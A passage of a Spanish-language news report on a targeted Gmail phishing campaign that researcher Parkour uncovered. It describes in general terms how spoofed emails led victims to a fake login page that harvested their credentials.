“Yo seguí un caso; ellos (Google) lo cogieron y descubrieron muchos más del mismo tipo”, dijo, apuntando que el método de ataque fue dirigido e invasivo.

Parkour estuvo involucrada inicialmente en la investigación de uno de estos sucesos de phishing, en los que los usuarios son engañados para dar información delicada, y entonces empezó a reunir información sobre otros similares.

Google rechazó hacer comentarios sobre el informe de Parkour, pero una fuente conocedora de la materia dijo que había similitudes entre el ataque que ella analizó y el resto de la campaña. La fuente no quiso identificarse debido a lo delicado del asunto.

La compañía de internet, que ya fue víctima de un sofisticado episodio de ataque informático el año pasado, no dio más detalles sobre el caso reciente.

La empresa aseguró que la infraestructura de Gmail no había sido comprometida.

METODO

El análisis de Parkour en febrero mostró que los piratas enviaban correos a sus víctimas desde una dirección falsa, que pretendía ser la de una persona cercana para ganarse su confianza. El mensaje contenía un vínculo o un archivo adjunto.

Cuando las víctimas pinchaban en el vínculo o el documento, se les incitaba a introducir sus credenciales en una página de inicio de Gmail falsa creada para hacerse con los nombres de usuario y las contraseñas, tras lo cual los piratas tenían pleno acceso a sus cuentas.

En el caso que estudió Parkour, la víctima estableció contacto sin saberlo con los piratas entre mayo de 2010 y febrero de 2011, según las capturas de pantalla que posteó.

“Las víctimas eran cuidadosamente seleccionadas, y tenían acceso a información delicada y un ciertohttp://www.blogger.com/img/blank.gif dominio de la materia”, dijo Parkour, añadiendo que la víctima del caso que ella estudió pensó que contestaba alguien que conocía.

Parkour dijo que los ataques a Gmail podrían ser el sustrato de un ataque más serio usando software malicioso, o malware. Muchas de las cuentas de Gmail eran de personal con acceso a información delicada.

“La información recopilada podría ayudarles en el próximo ataque, que podría ser de malware, y los atacantes podrían tener acceso a redes corporativas y gubernamentales cuando la víctima se conectara desde un PC comprometido”, añadió.

Fuente Noticiasdot.com